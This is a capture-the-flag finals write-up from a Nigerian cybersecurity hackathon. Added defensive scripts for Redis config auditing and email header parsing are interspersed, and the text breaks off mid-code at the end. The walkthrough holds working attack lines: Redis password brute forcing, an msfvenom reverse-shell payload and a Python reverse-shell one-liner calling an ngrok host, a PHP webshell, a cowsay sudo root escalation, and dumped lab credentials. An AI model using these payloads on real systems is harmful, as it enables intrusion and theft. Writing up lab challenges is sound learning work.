Overview Of The CTF
As part of the 2021 Cybersecurity Conference, the American Business Council Nigeria (ABC Nigeria), in partnership with private sector partners, is hosting a Cybersecurity Hackathon organized by NaijaSecForce. The objective of the hackathon is to highlight the capacity in the space and show the importance of implementing a cybersecurity framework in Nigeria.
The Hackathon will award innovators for displaying their level of expertise and skills in developing solutions to cyber challenges. A Cyber Award will be allocated in kind and will be distributed among the top three winners.
Cyber Awards will be awarded to the top three teams. Prizes include laptops, cybersecurity certificates, a bootcamp for winners on Security in IBM Cloud, Cisco Certified CyberOps Associate certifications for the team captains, and merchandise. The award is sponsored by Cisco, IBM, Comercio and American Business Council.
Cybersecurity Hackathon Competition Finals Write Up By RedTeamNG
Damn man, I'm so excited working on this write-up, like man, all the challenges are pretty cool. Come on Muzec, just get started already lol.
WYSIWYG - 700 Point
Man, I keep saying it: we always start with an Nmap scan.
muz3c@RedTeamNG:/$ nmap -sC -Pn -sV -p- 193.37.212.211 -T4
Starting Nmap 7.70 ( https://nmap.org ) at 2021-08-26 05:51 EDT
Stats: 0:01:39 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 49.69% done; ETC: 05:54 (0:01:41 remaining)
Nmap scan report for 193.37.212.211
Host is up (0.20s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
6379/tcp open redis Redis key-value store
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.35 seconds
So we have some interesting ports: 22, which is SSH, and 6379, ahhh the mighty Redis port, but no HTTP or HTTPS, I mean port 80 or 443 (man, don't google that up again lol, just kidding). I think we all know SSH, but before diving deep let's look into the Redis port.
What IS Redis
Redis is an in-memory data structure store, used as a distributed, in-memory key–value database, cache and message broker, with optional durability. Redis supports different kinds of abstract data structures, such as strings, lists, maps, sets, sorted sets, HyperLogLogs, bitmaps, streams, and spatial indices. It listens on port 6379 by default, which can be changed, probably for security reasons. Man, let's just hack it; feel free to check the Redis documentation.
Redis Manual Enumeration
redis-cli -h 193.37.212.211
Seems anonymous logins are not allowed, so let's try brute forcing with hydra.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ hydra -P /usr/share/wordlists/rockyou.txt 193.37.212.211 redis
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-26 08:05:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking redis://193.37.212.211:6379/
[6379][redis] host: 193.37.212.211 password: hotdog
[STATUS] 2964.00 tries/min, 2964 tries in 00:01h, 14341435 to do in 80:39h, 16 active
Ahhh nice, we have the password. Now let's log in to Redis again with the new credentials.
We are in. Typing info gives us some more information about the databases and bla bla bla. Now let's dump something using redis-dump.
redis-dump -u 193.37.212.211 -a hotdog > full.json
Avoid the wget bla bla bla
I don't know what the dude was trying to wget in Redis. Now that we have the credentials, let's just crack the hash.
we have credentials for SSH now.
lowprivuser
passw0rd123
But let's go back to Redis and try to read the databases manually.
SELECT 0
KEYS *
GET "lowprivuser"
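What made this step work is a Redis port reachable from the internet behind a password that sits in rockyou.txt. As an added example (not part of the original write-up), this audits a redis.conf for those settings; the two sample configs, the short password list and the 20-character minimum are constructed assumptions.

```python
"""Audit a redis.conf for the weaknesses this challenge relied on (added example)."""
import ipaddress

# Constructed stand-in for a real wordlist such as rockyou.txt.
COMMON_PASSWORDS = {"hotdog", "password", "123456", "redis", "admin"}

# Constructed sample resembling the challenge host: public bind, guessable password.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
requirepass hotdog
"""

# Constructed corrected version: loopback only, long random password.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass 9f2c7e41b0a8d6535c1e4f7a2b9d0c68
"""


def parse_conf(text):
    """Return {directive: [args, ...]}, one args list per occurrence."""
    conf = {}
    for raw in text.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def is_loopback(addr):
    """True for 127.0.0.0/8 and ::1; a leading '-' (optional address) is ignored."""
    try:
        return ipaddress.ip_address(addr.lstrip("-")).is_loopback
    except ValueError:          # '*' or a host name
        return False


def audit(text, min_len=20):
    """Return finding names for one config, in a fixed order."""
    conf = parse_conf(text)
    findings = []
    # Without a bind directive Redis listens on every interface.
    binds = conf.get("bind", [[]])[-1]
    if not binds or not all(is_loopback(a) for a in binds):
        findings.append("non-loopback-bind")
    if conf.get("protected-mode", [["yes"]])[-1] == ["no"]:
        findings.append("protected-mode-off")
    if "requirepass" not in conf:
        findings.append("no-password")
    else:
        password = " ".join(conf["requirepass"][-1]).strip('"')
        if password.lower() in COMMON_PASSWORDS:
            findings.append("wordlist-password")
        elif len(password) < min_len:
            findings.append("short-password")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(text) or "no findings")
```

The config cannot show the other problem seen here, SSH credentials stored as a Redis key; that needs a review of what the application writes into the store.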
Now back using SSH.
We are in. Let's check the shell we have with echo $SHELL.
Ahhh rbash, restricted lol. rudefish, I will get you lol.
sudo -l
But nothing, so let's check how many users we have on the Linux system first.
More users, cool. Let's go to the home directory; it seems we are still restricted, so let's break out of it.
Breaking Out With VI
vi
:set shell=/bin/sh
:shell
We have no access to the abcctf folder, so let's find a way to escalate our privileges.
We have port 80 running locally, plus the MySQL port and the DNS port. Now let's port forward using SSH.
ssh -L 8080:localhost:80 lowprivuser@193.37.212.211
Accessing localhost:8080
But I have no idea why I'm having problems using the SSH port forwarding, so let's transfer it. Man, I hate using Metasploit.
Generating Payload With Msfvenom
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=10969 -f elf > shell.elf
NOTE:- I will be using ngrok to receive the connection back. It's actually pretty cool, you should try it.
Seems we have generated our payload and our listener is ready on msfconsole.
NOTE:- you also need to transfer your payload to the target to execute it.
Checking our listener and boom, Meterpreter session 1 opened.
portfwd add -l 80 -p 80 -r 127.0.0.1
Port forwarding, I know you know.
Now accessing the web server on our localhost.
Now let's try to create an account.
We are in.
Simple Image Gallery System 1.0: a quick Google search and we know it's vulnerable to SQL injection and RCE. Since we have registered a user, let's hit the RCE.
So I decided to upload PHP command injection code on the profile picture page.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ cat shell.php
<?php system ($_GET['cmd']) ?>
Boom, we have command injection. Now let's get a reverse shell.
Checking back on our Ncat listener.
Now let's spawn a TTY shell.
python3 -c 'import pty; pty.spawn ("/bin/bash")'
Now let's enumerate more on the target using linpeas.sh.
/var/www/html/gallery/initialize.php:if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"forthedubs");
/var/www/html/gallery/initialize.php:if(!defined('DB_USERNAME')) define('DB_USERNAME',"www-data");
Ahhh, we have some credentials for the database. Let's try them on MySQL.
We are in.
mysql> SELECT * from users;
SELECT * from users;
+----+--------------+----------+----------+----------------------------------+-------------------------------------------------+------------+------+---------------------+---------------------+
| id | firstname | lastname | username | password | avatar | last_login | type | date_added | date_updated |
+----+--------------+----------+----------+----------------------------------+-------------------------------------------------+------------+------+---------------------+---------------------+
| 1 | Adminstrator | Admin | admin | 0192023a7bbd73250516f069df18b500 | uploads/1629675420_TagorbnpwmgzgrsorojLetta.php | NULL | 1 | 2021-01-20 14:02:37 | 2021-08-22 23:37:40 |
| 2 | Jane | Doe | abcctf | zburhWD2B7PqTx6sVfVszBE3KhgCqT | uploads/1624240500_avatar.png | NULL | 1 | 2021-01-20 14:02:37 | 2021-06-21 09:55:07 |
| 10 | rat | rat | rat | d285ed4b87f365a2273842b0208a60c8 | NULL | NULL | 0 | 2021-08-23 20:56:20 | NULL |
| 11 | bots | bots | bots | 2241bbfb8e26f6de627e38a1bbcdc9a9 | uploads/1629752160_webshell.php | NULL | 0 | 2021-08-23 20:56:33 | NULL |
| 12 | ratty | rattyu | ratty | d285ed4b87f365a2273842b0208a60c8 | uploads/1629752220_Capture.PNG | NULL | 0 | 2021-08-23 20:57:47 | NULL |
| 13 | bots | bots | bots | 21f1a6f87b2137da269ccb2e3030889a | uploads/1629752280_webshell.php | NULL | 0 | 2021-08-23 20:58:18 | NULL |
| 14 | bots | bots | bots | 21f1a6f87b2137da269ccb2e3030889a | uploads/1629752280_webshell.php | NULL | 0 | 2021-08-23 20:58:25 | NULL |
| 15 | ratty | ratty | ratty | 289462fcc025ce66f113ac73a13131cf | uploads/1629752400_God.png | NULL | 0 | 2021-08-23 21:00:58 | NULL |
| 16 | | | ratty | d285ed4b87f365a2273842b0208a60c8 | NULL | NULL | 0 | 2021-08-23 21:06:07 | NULL |
| 17 | Musa | saminu | muzec | bc05d7cbe414aa0f785d54525c2f822d | uploads/1629994260_shell.php | NULL | 0 | 2021-08-26 14:13:39 | 2021-08-26 16:11:48 |
| 18 | Musa | Saminu | muzec | bc05d7cbe414aa0f785d54525c2f822d | uploads/1629987780_muzec.png | NULL | 0 | 2021-08-26 14:23:10 | NULL |
+----+--------------+----------+----------+----------------------------------+-------------------------------------------------+------------+------+---------------------+---------------------+
I was able to dump some users' credentials, but the one that I found interesting is:
| 2 | Jane | Doe | abcctf | zburhWD2B7PqTx6sVfVszBE3KhgCqT | uploads/1624240500_avatar.png | NULL | 1 | 2021-01-20 14:02:3
abcctf is also a user on the system, so let's try it using su abcctf with the password.
We are in hahhahahaha, and we can also run sudo.
We have the first part of the flag. Now let's root it.
ROOT
abcctf@vps:~$ sudo -l
Matching Defaults entries for abcctf on vps:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User abcctf may run the following commands on vps:
(root) /usr/games/cowsay
abcctf@vps:~$ TF=$(mktemp)
abcctf@vps:~$ echo 'exec "/bin/sh";' >$TF
abcctf@vps:~$ sudo /usr/games/cowsay -f $TF x
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
final_part.txt snap
# cat final_part.txt
Congratulations, you made it to the end. Herer is the remaining part of your flag.
0r_4re_clos3r_than_they_app34r}
# echo "Muzec is Here" > .root.txt
#
We are done fun right?? hahahahaha
Final Flag:- abcctf{0bjects_!n_the_Mirr0r_4re_clos3r_than_they_app34r}
Mr Obiora, the BEC victim - 500 point
Mr. Obiora Nurudeen - despite having attended multiple security awareness sessions - still loves to open unknown attachments regardless of the format. Try to get Mr. Obiora to run your malicious payload so you can access his PC. His email is obiora_nurudeen@ctf.ng.
What is his IP address?
Man, it was way cool. I actually solved it the unintended way, cool right? I know, I love breaking things the unintended way. Since we have the email address, why not try sending a mail? Maybe we will get a reply back.
SPAMMING
Muzec Saminu <redacted@gmail.com>
Aug 24, 2021, 4:34 AM (3 days ago)
to obiora_nurudeen
checking
I waited an hour before getting a reply back, which is job well done lol.
Now let's try getting the IP address.
Show original
Going through it, I was able to get Mr. Obiora's IP address: 185.177.59.120
Final Flag:- abcctf{185.177.59.120}
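Gmail's Show original view is the raw message, and the address comes from its Received chain. As an added example (not part of the original write-up), this parses that chain and returns the address recorded by the receiving MX, the only hop the recipient can trust; the message is constructed, and apart from 185.177.59.120 and the ctf.ng address every host name, id and address in it is made up.

```python
"""Read the relay chain of a raw e-mail (added example, constructed message)."""
import email
import ipaddress
import re

# Constructed raw message. Only 185.177.59.120 and the ctf.ng address come from
# the write-up; host names, ids and the other addresses are made up.
RAW = """\
Received: by 2002:a05:6402:0:0:0:0:1 with SMTP id x1csp100;
        Tue, 24 Aug 2021 05:40:02 -0700 (PDT)
Received: from mail.example.test (mail.example.test. [185.177.59.120])
        by mx.google.com with ESMTPS id y2si200
        for <player@example.com>; Tue, 24 Aug 2021 05:40:01 -0700 (PDT)
Received: from desktop (unknown [10.0.0.23])
        by mail.example.test with ESMTP id 4Gv0;
        Tue, 24 Aug 2021 12:39:58 +0000 (UTC)
From: obiora_nurudeen@ctf.ng
To: player@example.com
Subject: Re: checking

job well done
"""

FROM_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\([^\[\]]*\[(?:IPv6:)?(?P<ip>[0-9A-Fa-f:.]+)\]\)")
BY_RE = re.compile(r"\bby\s+(?P<by>\S+)")


def hops(raw):
    """Return the Received chain oldest-first as (helo, ip, by) tuples."""
    msg = email.message_from_string(raw)
    chain = []
    for value in reversed(msg.get_all("Received", [])):
        flat = " ".join(value.split())          # undo header folding
        src, dst = FROM_RE.search(flat), BY_RE.search(flat)
        ip = None
        if src:
            try:
                ip = str(ipaddress.ip_address(src.group("ip")))
            except ValueError:                  # bracketed text was not an address
                ip = None
        chain.append((src.group("helo") if src else None, ip,
                      dst.group("by") if dst else None))
    return chain


def sender_ip(raw, trusted_by):
    """Address our own MX (trusted_by) saw the message arrive from, or None."""
    for _helo, ip, by in hops(raw):
        if by == trusted_by and ip:
            return ip
    return None


def unverified_ips(raw, trusted_by):
    """Addresses from hops older than our MX: written by the sending side, forgeable."""
    found = []
    for _helo, ip, by in hops(raw):
        if by == trusted_by:
            break
        if ip:
            found.append(ip)
    return found


if __name__ == "__main__":
    print("seen by MX:", sender_ip(RAW, "mx.google.com"))
    print("unverified:", unverified_ips(RAW, "mx.google.com"))
```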
Easy Peasy - 100 point
Easy peasy, too simple, just like the name states. We already have the URL to attack, so let's hit it.
A simple login page, plus a register button which seems not to be working hahahaha. Let's try some default credentials on the login page, like admin/admin.
No luck. Then admin/password,
but man, I got nothing. Let's try checking the source code.
Got nothing there either. Let's try to bust some directories with gobuster.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ gobuster dir -u http://185.203.119.50:4200/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh,pl,cgi,zip
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://185.203.119.50:4200/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: sh,pl,cgi,zip,txt,php,html,bak
[+] Timeout: 10s
===============================================================
2021/08/27 14:05:07 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 5277]
/dev (Status: 301) [Size: 321] [--> http://185.203.119.50:4200/dev/]
Some interesting development page, let's check it out.
Let's hit the source code again.
Cool, a hint. Let's try going down more.
Another hint, I think. Let's try decoding it using the terminal.
We are down to <!-- var _0x26a3=["\x4A\x61\x56\x61\x53\x63\x52\x69\x50\x74\x5F\x69\x53\x5F\x66\x55\x6E"];console.PassCode(_0x26a3[0]) -->
Seems like hex to me, let's try using CyberChef.
JaVaScRiPt_iS_fUn
A flag? Nah, I tried it but no luck. Maybe it's a password, let's dig more.
By the way, we have created a nice login page in PHP. Go find it out
We know we are on the development page, so let's bust the endpoint.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ gobuster dir -u http://185.203.119.50:4200/dev -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh,pl,cgi,zip
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://185.203.119.50:4200/dev
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: bak,sh,pl,cgi,zip,txt,php,html
[+] Timeout: 10s
===============================================================
2021/08/27 14:14:02 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 526]
/login.php (Status: 200) [Size: 1654]
Boom, I feel like a l33t hacker now lol. We have the login page, let's try the password on it.
Password:- JaVaScRiPt_iS_fUn
Not too sure, but let's try it.
Ahhh, it's the password, but it seems we need to try harder to get the flag lol. Let's check the page source again.
But it's a dead end. Maybe the image can help, let's wget it to our machine.
We have it. Now let's check some metadata bla bla bla using exiftool.
Boom, we got the flag page /ThE_FlAg_PaGe.html, let's hit it.
You made it champ, Here is your reward, the flag! and we got the flag.
Final Flag:- abcctf{H4cKiNG_i$_FuN_K33P_L34RN1NG}
Secret Keepers - The Beginning - 150 point
Let go of the burden, tell us your secrets. We have the URL to pwned, pwned, sorry, I mean attack, so let's hit it.
Nice, let's look around. We have some pages, let's check the contact us page.
Sweet, a flag page. Let's check it out, maybe it's way simple lol.
We have half a flag, damn: Your flag is abcctf{l3t_
Not that simple I guess; back to the contact form.
A little hint;-
Ermm, send to rudefish, he might have something for you
We should have a cookie present, let's check it with Cookie Editor.
Nice, it's sending to web-admin. Let's intercept the request with Burp and edit the cookie to rudefish.
Edit the request like in the image below.
Cookie: sendTo=rudefish
Now send it and let's check our mail; we should receive a mail from rudefish if it's right.
Boom, we have the complete flag now.
Final Flag:- abcctf{l3t_h4v3_your_secr375!}
Secret Keepers - Intermediate - 150 point
Now back to the rudefish mail.
One of my challenges is differentiating robots from humans. But since you are here, a human, I will let you in on a little secret.
User-Agent: *
Disallow: /115 101 99 114 101 116 45 99 111 110 116 114 111 108 45 99 101 110 116 101 114
Does that make sense? I hope so. See you at the other side.
Looks like decimal code.
Nice, I'm right. We have a secret page, cool: secret-control-center. Let's access it.
Admin Control Center, cool. We already have the email, rudefish@secretkeepers.abc, but we are missing a password hahahaha. Nice, brute forcing I guess. Let's try creating a wordlist from the URL with cewl.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ cewl http://185.203.119.50:6500/home > abc.txt
But man, it was generating rubbish, so let's try to extract the words on their own.
Never
seek
to
tell
thy
love
Love
that
never
told
can
be
For
the
gentle
wind
does
move
Silently
invisibly
I
told
my
love
I
told
mylove
I
told
her
all
my
heart
Trembling
cold
in
ghastly
fears
Ah
she
doth
depart
Soon
as
she
was
gone
from
me
A
traveller
whistleblower
came
by
Silently
invisibly
O
was
no
deny
https
com
www
creative
tim
paper
kit
notice
and
Paper
Kit
Angular
Product
Page
product
angular
Copyright
Creative
Tim
Licensed
under
MIT
github
timcreative
blob
master
LICENSE
The
above
copyright
this
permission
shall
included
all
copies
substantial
portions
the
Software
Secret
Keepers
Fonts
icons
Save it in a txt file. Now let's intercept the login form and brute force the hell out of it.
Intercept with Burp.
Send to Intruder.
Now click on Clear; we only need the password field to brute force.
Now let's add it.
Now let's click on Payloads.
Click on Payload Options and load the wordlist. After that, click on Start attack.
When we have the right password, the status and the length will be different.
We are in, the password is whistleblower. Now let's log in.
We are in man, we are in, awesome right? Let's get the flag.
Final Flag:- abcctf{g00d_t0_se3_you_here_hum4n}
Secret Keepers - The End - 100 point
Seems we can execute some commands, so let's get a reverse shell.
Now let's get a reverse shell using ngrok.
Ncat listener ready.
Reverse shell payload ready.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("2.tcp.ngrok.io",19733));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Checking our Ncat listener and we have a shell.
Now hunting for the last flag, I checked the root folder and got nothing.
But it seems we have a hidden git folder, let's check it out.
Going through some commits we have some leads, and we have the last flag hahahaaha, fun right??
Final Flag:- abcctf{remember_YoUr_s3cret_!s_safe_with_us}
All clear man, I had fun. Let's hit it.
Pinky and The mouse - 100 point
Let's download the head.txt file.
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>---.+.+..+++++++++++++++++.--------------.+++++++++++++++++++++.<+++++++++++++.>------------------.++++.+++.----.<++++++.++++++.-----------------------------.>++++++.<--.>---------.+++++.---------------------.++++++++++++++++++++++++++++++++++++.
Definitely Brainf*ck code, let's hit it.
Final Flag:- abcctf{SimplY_Br@inY}
Gentle Reminder - 250 point
Never put sensitive things in your purse. Man, let's just download it.
011^0000^1011^011^00^0100^0100^1011^111^001^1000^0^0100^111^111^101^00^10^110^0010^111^010^011^0000^01^1^00^000^10^111^1^11^00^000^000^00^10^110^0^11^111^000^00011^011^01^1011^0100^0110^11^00^000^0^000^010^11111^11^0010^1^1010^1010^1000^01^01^11^111^10^110^11^00^000^000^00^10^110^1^0000^00^10^110^000^111^010^100^111^1011^111^001^10^111^1^101^10^111^011^1^0000^01^1^00^1^011^00^0100^0100^0100^0^01^100^1^111^1011^111^001^0100^111^111^101^00^10^110^1^111^111^100^0^0^0110^0100^1011^01^10^100^011^00^100^0^0100^1011^0010^111^010^011^0000^01^1^000^0000^111^001^0100^100^10^111^1^1000^0^000^111^001^110^0000^1^0010^111^010^00^10^1^0000^0^0100^01^10^100^111^0010^1^0000^0^110^01^11^0
I will call it a fu#king broken binary, why not. Let's fix it.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ cat binary.txt | tr '^' ' '
011 0000 1011 011 00 0100 0100 1011 111 001 1000 0 0100 111 111 101 00 10 110 0010 111 010 011 0000 01 1 00 000 10 111 1 11 00 000 000 00 10 110 0 11 111 000 00011 011 01 1011 0100 0110 11 00 000 0 000 010 11111 11 0010 1 1010 1010 1000 01 01 11 111 10 110 11 00 000 000 00 10 110 1 0000 00 10 110 000 111 010 100 111 1011 111 001 10 111 1 101 10 111 011 1 0000 01 1 00 1 011 00 0100 0100 0100 0 01 100 1 111 1011 111 001 0100 111 111 101 00 10 110 1 111 111 100 0 0 0110 0100 1011 01 10 100 011 00 100 0 0100 1011 0010 111 010 011 0000 01 1 000 0000 111 001 0100 100 10 111 1 1000 0 000 111 001 110 0000 1 0010 111 010 00 10 1 0000 0 0100 01 10 100 111 0010 1 0000 0 110 01 11 0
Cutting out the ^ and also adding some spaces.
# crypto.py: decode Morse code written as binary (0 = dot, 1 = dash)
a = input("input the string:")
s = a.split()  # groups are separated by spaces
morse = {'01': 'A',
         '1000': 'B',
         '1010': 'C',
         '100': 'D',
         '0': 'E',
         '0010': 'F',
         '110': 'G',
         '0000': 'H',
         '00': 'I',
         '0111': 'J',
         '101': 'K',
         '0100': 'L',
         '11': 'M',
         '10': 'N',
         '111': 'O',
         '0110': 'P',
         '1101': 'Q',
         '010': 'R',
         '000': 'S',
         '1': 'T',
         '001': 'U',
         '0001': 'V',
         '011': 'W',
         '1001': 'X',
         '1011': 'Y',
         '1100': 'Z',
         '01111': '1',
         '00111': '2',
         '00011': '3',
         '00001': '4',
         '00000': '5',
         '10000': '6',
         '11000': '7',
         '11100': '8',
         '11110': '9',
         '11111': '0',
         '001100': '?',
         '10010': '/',
         '101101': ')',   # -.--.- is the closing parenthesis
         '100001': '-',
         '010101': '.',
         '110011': ',',
         '011010': '@',
         '111000': ':',
         '101010': ';',   # -.-.-. is the semicolon
         '10001': '=',
         '011110': "'",
         '101011': '!',
         '001101': '_',
         '010010': '"',
         '10110': '(',
         '1111011': '{',
         '1111101': '}'
         }
# Look up every group and print the letters on one line
for item in s:
    print(morse[item], end='')
print()
A really cool script to decode it.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ python3 crypto.py
input the string:011 0000 1011 011 00 0100 0100 1011 111 001 1000 0 0100 111 111 101 00 10 110 0010 111 010 011 0000 01 1 00 000 10 111 1 11 00 000 000 00 10 110 0 11 111 000 00011 011 01 1011 0100 0110 11 00 000 0 000 010 11111 11 0010 1 1010 1010 1000 01 01 11 111 10 110 11 00 000 000 00 10 110 1 0000 00 10 110 000 111 010 100 111 1011 111 001 10 111 1 101 10 111 011 1 0000 01 1 00 1 011 00 0100 0100 0100 0 01 100 1 111 1011 111 001 0100 111 111 101 00 10 110 1 111 111 100 0 0 0110 0100 1011 01 10 100 011 00 100 0 0100 1011 0010 111 010 011 0000 01 1 000 0000 111 001 0100 100 10 111 1 1000 0 000 111 001 110 0000 1 0010 111 010 00 10 1 0000 0 0100 01 10 100 111 0010 1 0000 0 110 01 11 0
WHYWILLYOUBELOOKINGFORWHATISNOTMISSINGEMOS3WAYLPMISESR0MFTCCBAAMONGMISSINGTHINGSORDOYOUNOTKNOWTHATITWILLLEADTOYOULOOKINGTOODEEPLYANDWIDELYFORWHATSHOULDNOTBESOUGHTFORINTHELANDOFTHEGAME
In clear format;
WHY WILL YOU BE LOOKING FOR WHAT IS NOT MISSING EMOS3WAYLPMISESR0MFTCCBA AMONG MISSING THINGS OR DO YOU NOT KNOW THAT IT WILL LEAD TO YOU LOOKING TOO DEEPLY AND WIDELY FOR WHAT SHOULD NOT BE SOUGHT FOR IN THE LAND OF THE GAME
A word is in reverse, let's fix that.
We have the flag; since we know the format it should be easy.
Final Flag:- abcctf{m0rse_simply_aw3some}
No-brainer - 350 point
I wonder if they use their brains at all, or something else. Man, you talk too much, let's just hit it.
JSFuck, it should be easy.
Decoding and we got return"aler\164\50a\142\143\143\164f\173\102r\100in\137\167\110\101\164s\137u\120\175\51"
Definitely a JavaScript string.
Final Flag:- abcctf{Br@in_wHAts_uP}
Read read Read - 500 point
Learning by books make sense
A docx file was given for this challenge. Given the word hint biblio (book) as the file name and the challenge title “read read read”, I thought it might be a book cipher.
My first attempt was to view the document as is, in its .docx format. It turned out to be a one-page document with multiple paragraphs whose content was basic, nothing special.
So if this was truly a book cipher as suspected, I knew I needed some sort of key(s) to crack it. A quick note: docx files are actually zip archives with a bunch of XML files and all the attached media. I decided to pass it straight into CyberChef for unzipping and further analysis.
With the help of CyberChef's Unzip tool, I was able to bake (extract) it to reveal the underlying files, which were XML and rels files. Clicking through each file in turn, I came across an interesting XML, “words/rel/rels.xml”. Interesting because it had a PNG signature.
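The check done by hand in CyberChef, a part named .xml that starts with a PNG signature, can be automated. As an added example (not part of the original write-up), this opens a docx as a zip and reports XML/rels parts whose first bytes are not text; the archive is built in memory as a constructed sample, and only the part name words/rel/rels.xml is taken from the text above.

```python
"""Find docx parts whose content does not match their .xml/.rels name (added example)."""
import io
import zipfile

# Magic bytes of a few formats that do not belong in an XML or rels part.
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"PK\x03\x04": "zip",
    b"%PDF-": "pdf",
    b"MZ": "pe",
}
TEXT_EXTS = (".xml", ".rels")


def sniff(head):
    """Return the format name for a known signature, else None."""
    for magic, kind in SIGNATURES.items():
        if head.startswith(magic):
            return kind
    return None


def mismatched_parts(docx_bytes):
    """Return [(part name, detected type)] for .xml/.rels parts that are not markup."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(TEXT_EXTS):
                continue
            with zf.open(info) as fh:
                head = fh.read(16)
            if not head:
                continue                      # empty part, nothing to classify
            kind = sniff(head)
            # Real XML starts with '<', optionally after a UTF-8 BOM or whitespace.
            if kind is None and not head.lstrip(b"\xef\xbb\xbf \t\r\n").startswith(b"<"):
                kind = "unknown-binary"
            if kind:
                hits.append((info.filename, kind))
    return hits


def build_sample():
    """Constructed docx-like archive: two genuine XML parts, one PNG named as XML."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        zf.writestr("word/document.xml", '<?xml version="1.0"?><w:document/>')
        zf.writestr("words/rel/rels.xml", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    return buf.getvalue()


if __name__ == "__main__":
    for name, kind in mismatched_parts(build_sample()):
        print(f"{name}: looks like {kind}")
```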
I downloaded this file from CyberChef's results, then converted and opened it to reveal 15 rows and 3 columns of digits, as shown below;
6 1 13
1 2 22
5 1 60
3 1 4
4 3 10
1 2 2
8 4 2
5 2 1
6 2 16
2 3 24
2 2 5
6 2 16
1 2 23
1 3 1
1 2 30
Alas! The keys!!
Next was to find out how these 3-part keys fit into the book cipher, as most book ciphers consist mainly of 2 parts. But the major key here was making sure to open the Word document in its original layout using Office Word (software or online version) and not a text-wrapping docx viewer, in order not to mess up the document's line layout.
Since the docx had only 1 page, the first part of the key couldn't be a page number, so I decided to take it as the paragraph number, as there are only 8 paragraphs in the text and the highest key digit in the first column was 8, which made it fit perfectly.
For the second key part, it had to translate to the line number to give us the right position to apply the third key.
The final key was a bit confusing, as it could mean either a word count (to choose the first letter) or a letter count. After seeing the greatest value of 60, and that no paragraph had up to 60 words, I opted for the second option of a letter count starting from the line number obtained from the second key part, to reveal;
6 1 13 --- c
1 2 22 --- 1
5 1 60 --- P
3 1 4 --- h
4 3 10 --- 3
1 2 2 --- r
8 4 2 --- f
5 2 1 --- R
6 2 16 --- 0
2 3 24 --- m
2 2 5 --- b
6 2 16 --- 0
1 2 23 --- 0
1 3 1 --- k
1 2 30 --- 5
Since we know the flag format it should be easy.
Final Flag:- abcctf{c1Ph3r_fr0m_b00k5}
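The layout caveat above decides the result: the same keys give different letters once the lines wrap differently. As an added example (not part of the original write-up), this decodes (paragraph, line, letter) keys against a text at several wrap widths; the text and keys are constructed, and counting letters without spaces is an assumption.

```python
"""Book cipher keyed by (paragraph, line, letter), all 1-indexed (added example)."""
import textwrap

# Constructed two-paragraph "book"; the challenge document is not reproduced here.
PARAGRAPHS = [
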